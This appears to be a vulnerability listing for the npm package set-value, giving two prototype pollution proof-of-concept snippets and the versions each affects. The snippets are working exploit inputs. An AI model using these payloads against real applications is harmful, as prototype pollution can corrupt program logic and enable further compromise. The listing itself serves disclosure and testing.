README.md

set-value

Set nested properties on an object using dot notation.

Latest version: 4.0.0

Exploits

const set = require('set-value');

set({}, '__proto__.a', 'b');
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 0.1.0 0.1.1 0.1.2 0.1.3 0.1.4 0.1.6 0.2.0 0.3.0 0.3.1 0.3.2 0.3.3 0.4.0 0.4.1 0.4.2 0.4.3 1.0.0 2.0.0 3.0.0

const set = require('set-value');

set({}, 'constructor.prototype.a', 'b');
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 0.4.3 1.0.0 2.0.0 3.0.0